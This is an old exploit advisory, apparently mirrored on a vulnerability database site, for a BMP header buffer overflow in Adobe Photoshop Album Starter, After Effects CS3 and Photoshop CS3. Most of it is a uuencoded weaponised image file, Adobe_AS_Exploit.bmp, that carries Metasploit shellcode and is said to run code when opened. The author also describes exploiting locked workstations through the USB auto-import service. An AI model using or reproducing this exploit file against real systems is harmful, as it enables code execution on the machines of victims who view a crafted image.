Vulners
Lucene search
adobealbum-overflow.txt
`Exploitable issue in various Adobe products
c0ntex ([email protected]) Scott Laurie
February 2008
Vulnerable applications, tested:
Adobe Photoshop Album Starter
Adobe After Effects CS3
Adobe Photoshop CS3
Not Vulnerable applications, tested:
Adobe Reader
Adobe Flash Player
This bug is related to the parsing of header images, in that the
applications
do not verify that the image header is valid before trying to render it.
This
leaves an opportunity to cause an unchecked buffer overflow and allow for
the
execution of malicious code.
All the issues are standard local overflows whereby an attacker can exploit
a
machine after sending the malicious image to the user, or by placing the
image
on a web site or email and waiting for a user to view it in one of the
effected
products.
One fun thing with Album Starter is that it will run a service which will
look
for new devices being attached to the system, things like cameras or USB
drives
and when one is found it will check the device for image files. If some are
found, the application will auto-run and import the images and thus allow
the
attacker to exploit locked workstations.. pretty lame but fun :)
There is a caveats to the bug as the shellcode and return address need to be
4
byte values. Thus a return address of 0x41424344 needs to be in the
following
format: "\x44\x44\x44\x44\x43\x43\x43\x43\x42\x42\x42\x42\x41\x41\x41\x41"
Exploit attached for Album Starter 3.2 on Windows XP SP2 to pop calc.exe:
Used shellcode is taken from the Metasploit project.
begin 644 Adobe_AS_Exploit.bmp
M0DTV`````````#8````H````0`8``+`$```!``@`04%!04%!04%!04%!04%!
M04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!
M04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!
M04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!
M04%!04%!04%!04%!04%!04%!04'\:NM-Z/G___]@BVPD)(M%/(M\!7@![XM/
M&(M?(`'K28LTBP'N,<"9K(3`="#!R@T*`<+K]#M4)"AUY8M?)`'K9HL,2XM?
M'`'K`RR+B6PD'&'#,=MDBT,PBT`,BW`<K8M`"%YHCDX.[%#_UF939F@S,FAW
M<S)?5/_0:,OM_#M0_]9?B>5F@>T(`E5J`O_0:-D)]:U7_]934U-34T-30U/_
MT&9H!-)F4XGAE6BD&G#'5__6:A!15?_0:*2M+NE7_]935?_0:.5)ADE7_]90
M5%15_]"3:.=YQGE7_]95_]!F:F1F:&-MB>5J4%DIS(GG:D2)XC'`\ZK^0BW^
M0BR3C7HXJZNK:'+^LQ;_=43_UEM74E%146H!45%54?_0:*W9!<Y3_]9J__\W
M_]"+5_R#Q&3_UE+_T&CPB@1?4__6_]``04%!04%!04%!04%!04%!04%!04%!
M04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!
M04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!
M04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!
M04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!
M04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!
M04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!
M04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!
M04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!
M04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!
M04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!
M04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!
M04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!
M04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!
M04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!
M04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!
M04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!
M04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!
M04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!
M04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!
M04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!
M04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!
M04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!
M04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!
M04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!
M04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!
M04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!
M04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!
M04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!
M04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!
M04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!
M04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!
M04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!
M04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!
M04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!
M04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!
M04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!
M04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!
M04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!
M04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!
M04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!
M04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!
M04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!
M04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!
M04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!
M04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!
M04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!
M04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!
M04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!
M04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!
M04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!
M04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!
M04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!
M04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!
M04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!
M04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!
M04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!
M04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!
M04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!
M04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!
M04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!
M04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!
M04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!
M04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!
M04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!
M04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!
M04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!
M04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!
M04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!
M04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!
M04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!
M04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!
M04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!
M04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!
M04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!
M04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!
M04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!
M04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!
M04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!
M04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!
M04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!
M04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!
M04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!
M04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!
M04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!
M04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!
M04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!
M04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!
M04%!04%!04%!04%!04%!04%!04%!0D)"0D)"0D)"0D)"0D)"0D)"0D)"0D)"
M0D)"0D)"0D)"0D)"0D)"0D)"0D)"0D)"0D)"0D)"0D)"0D)"0D)"0D)"0D)"
M0D)"0D)"0D)"0D)"0D)"0D)"0D)"0D)"0D)"0D)"0D)"0D)"0D)"0D)"0D)"
M0D)"0D)"0D)"0D)"0D)"0D)"0D)"0D)"0D)"0D)"0D)"0D)"0D)"0D)"0D)"
M0D)"0D)"0D)"0D)"0D)"0D)"0D)"0D)"0D)"0D)"0D)"0D)"0D)"0D)"0D)"
M0D)"0D)"0D)"0D)"0D)"0D)"0D)"0D)"0D)"0D)"0D)"0D)"0D)"0D)"0D)"
M0D)"0D)"0D)"0D)"0D)"0D)"0D)"0D)"0D)"0D)"0D)"0D)"0D)"0D)"0D)"
M0D)"0D)"0D)"0D)"0D)"0D)"0D)"0D)"0D)"0D)"0D)"0D)"0D)"0D)"0D)"
M0D)"0D)"0D)"0D)"0D)"0D)"0D)"0D)"0D)"0D)"0D)"0D)"0D)"0D)"0D)"
M0D)"0D)"0D)"0D)"0D)"0D)"0D)"0D)"0D)"0D)"0D)"0D)"0D)"0D)"0D)"
M0D)"0D)"0D)"0D)"0D)"0D)"0D)"0D)"0D)"0D)"0D-#0T-#0T-#0T-#0T-#
M0T-#0T-#0T-#0T-#0T-#0T-#0T-#0T-#0T-#0T-#0T-#Z^OKZP0$!`20D)"0
MD)"0D&9F9F9=75U=L+"PL&%A86&0D)"0D)"0D)"0D)"0D)"0,S,S,\G)R<F#
M@X.#Z>GIZ=W=W=W9V=G9[N[N[MG9V=ET='1T)"0D)/3T]/1;6UM;@8&!@7-S
M<W,3$Q,36EI:6N[N[NXG)R<GBHJ*BH.#@X/KZ^OK_/S\_.+BXN+T]/3TIJ:F
MI@8&!@9C8V-CBHJ*BEI:6EKN[N[NK*RLK,_/S\]F9F9F965E95M;6UN/CX^/
M(B(B(N_O[^_(R,C(`0$!`145%17V]O;VK*RLK-75U=5Z>GIZ[^_O[\S,S,S#
MP\/#T='1T=K:VMJLK*RLBXN+B[2TM+3?W]_?Y^?GYQ,3$Q/V]O;V:FIJ:N?G
MY^?^_O[^75U=72\O+R_M[>WMAX>'AUM;6ULL+"PLS,S,S'Y^?GYA86%ANKJZ
MN@,#`P..CHZ.+R\O+PL+"PNLK*RLU=75U7Y^?G[O[^_OS,S,S.SL[.S1T='1
MXN+BXFQL;&P!`0$!!04%!?+R\O(F)B8F86%A8='1T='R\O+RK*RLK(N+BXNQ
ML;&Q9V=G9WM[>WNNKJZN7EY>7BTM+2T6%A862DI*2CX^/CYE965E9V=G9[JZ
MNKK?W]_?+BXN+E]?7U^&AH:&T='1T:ZNKJXK*RLK`0$!`2HJ*BKR\O+RBHJ*
MB@$!`0$R,C(RYN;FYLS,S,R#@X.#T='1T6YN;FZ7EY>7BHJ*BEI:6EKN[N[N
MK*RLK.+BXN)F9F9FL;&QL186%A9\?'Q\.CHZ.KBXN+BNKJZN<G)R<MG9V=DN
M+BXN7%Q<7-K:VMHR,C(R'AX>'JVMK:V.CHZ.!04%!8:&AH:_O[^_='1T=-#0
MT-#@X.#@<'!P<'5U=76]O;V]C8V-C49&1D;FYN;F.3DY.<#`P,!"0D)"\O+R
1\C\_/S_N[N[N)R<G)XJ*BHH`
`
end
regards
c0ntex
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
21 Apr 2008 00:00Current